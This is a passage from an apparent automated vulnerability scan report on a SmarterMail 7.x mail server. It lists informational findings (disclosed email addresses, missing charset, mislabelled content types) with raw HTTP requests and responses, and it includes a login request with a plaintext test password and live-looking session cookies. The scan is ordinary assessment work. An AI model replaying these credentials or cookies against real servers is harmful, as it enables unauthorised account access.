ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=auser%40hoytllc.com&ctl00%24MPH%24txtPassword=auser123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:43 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:28:43 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5508

3590|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...
<div class="LoginLabel">
           Email Address
           (ex. user@example.com)
       </div>
       <input name="ctl00$MPH$txtUserName" type="text" value="auser@hoytllc.com" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
...[SNIP]...

13.6. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlert.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Alerts/frmAlert.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:56 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45700
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Events - hoytllc.com - S
...[SNIP]...
<td class="Setting">euser@hoytllc.com</td>
...[SNIP]...

13.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Calendar/frmEvent.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:58 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76205
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<input name="ctl00$MPH$txtEmailMe_SettingText" type="text" value="euser@hoytllc.com" id="ctl00_MPH_txtEmailMe_SettingText" class="text" style="width:300px;" />
...[SNIP]...

13.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:50 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 75949


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<input name="ctl00$MPH$txtEmailMe_SettingText" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_txtEmailMe_SettingText" class="text" style="width:300px;" />
...[SNIP]...

13.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAutocomplete.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmAutocomplete.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmAutocomplete.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12495
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Auto-complete - hoytllc.
...[SNIP]...
"urls":[]},{"uid":"global address list|fa30805e487b4352a362fff155e115ce","rowNumber":2,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"testme@hoytllc.com","c":"nw"},{"v":"testme","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]}],"checkedRows":[],"totalRows":3,"dirtyKey":"634215692908050000","labelText":null,"additionalJavas
...[SNIP]...

13.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmGAL.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmGAL.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmGAL.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:10 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16351
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Global Address List - ho
...[SNIP]...
<td class="rc leftpad">testme@hoytllc.com</td>
...[SNIP]...

13.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:34 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytl
...[SNIP]...
<input name="ctl00$MPH$wucUserSettings$txtDisplayName_SettingText" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_wucUserSettings_txtDisplayName_SettingText" class="text" />
...[SNIP]...

13.12. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<td class='ReportSubTitle'>(enduser@hoytllc.com)</td>
...[SNIP]...

13.13. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGateway.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/JavaScriptFlashGateway.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /SystemAdmin/JavaScriptFlashGateway.js HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: public
ETag: "1CB60CF5B830100"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 13392
Connection: Close

/*
Macromedia(r) Flash(r) JavaScript Integration Kit License


Copyright (c) 2005 Macromedia, inc. All rights reserved.

Redistribution and use in source and binary forms, with or without modifi
...[SNIP]...

--

This code is part of the Flash / JavaScript Integration Kit:
http://www.macromedia.com/go/flashjavascript/

Created by:

Christian Cantrell
http://weblogs.macromedia.com/cantrell/
mailto:cantrell@macromedia.com

Mike Chambers
http://weblogs.macromedia.com/mesh/
mailto:mesh@macromedia.com

Macromedia
*/

/**
* Create a new Exception object.
* name: The name of the exception.
* message: The exception message.
*/
function Exception(name, message)
{
if (name)

...[SNIP]...

13.14. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGatewayHttps.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/JavaScriptFlashGatewayHttps.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /SystemAdmin/JavaScriptFlashGatewayHttps.js HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: public
ETag: "1CB60CF5B830100"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 13394
Connection: Close

/*
Macromedia(r) Flash(r) JavaScript Integration Kit License


Copyright (c) 2005 Macromedia, inc. All rights reserved.

Redistribution and use in source and binary forms, with or without modifi
...[SNIP]...

--

This code is part of the Flash / JavaScript Integration Kit:
http://www.macromedia.com/go/flashjavascript/

Created by:

Christian Cantrell
http://weblogs.macromedia.com/cantrell/
mailto:cantrell@macromedia.com

Mike Chambers
http://weblogs.macromedia.com/mesh/
mailto:mesh@macromedia.com

Macromedia
*/

/**
* Create a new Exception object.
* name: The name of the exception.
* message: The exception message.
*/
function Exception(name, message)
{
if (name)

...[SNIP]...

14. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /FileStorageUpload.ashx

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

POST /FileStorageUpload.ashx?uploadValidationToken=98dee8a7f3fc415c919a873e64836960&pathField=Root+Folder%5c&userField=euser&domainField=hoytllc.com&name=fastdial.net-netsparker.pdf&chunk=1&chunks=3&offset=102400&file_size=224593 HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf
content-type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}
Content-Length: 102400

.I^.cw!.%..J..%.|Q..X...[s .\r..%.r.\..OZ.q.4..:......A.>d.yRz....H.$..3s/.4.!.Y.2.9=..^.kr..*c.    8l.5.z.t.}[X........-.
.>..Wr..9...j.[......sXV$..9k.^r..Ir.DH...Y.g.....Cr.J....Q....Sr.^.r.9T....'...
...[SNIP]...

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:11:42 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close


</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title
...[SNIP]...

15. Content type incorrectly stated  previous  next
There are 6 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


15.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:20:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8851

3820|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionH
...[SNIP]...

15.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=auser%40hoytllc.com&ctl00%24MPH%24txtPassword=auser123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:43 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:28:43 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5508

3590|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...

15.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 26574

ctl00%24ScriptManager1=ctl00%24MPH%24ctl00%7Cctl00%24MPH%24lnkRefresh&__LASTFOCUS=&__EVENTTARGET=ctl00%24MPH%24lnkRefresh&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IEN
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:52 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 68875

11|updatePanel|ctl00_UpdatePanel1|
               
           |29475|updatePanel|ctl00_MPH_ctl00|
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id
...[SNIP]...

15.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddFileStorageFolder.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}
Content-Length: 630

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BrPH%24SaveButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BrPH%24SaveButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9s
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 3114

246|updatePanel|ctl00_UpdatePanel1|
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure"><img src="/App_Themes/Default/Images/Icons/TipText/Failure.gif" alt=""/
...[SNIP]...

15.5. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:39 GMT
X-AspNet-Version: 2.0.50727
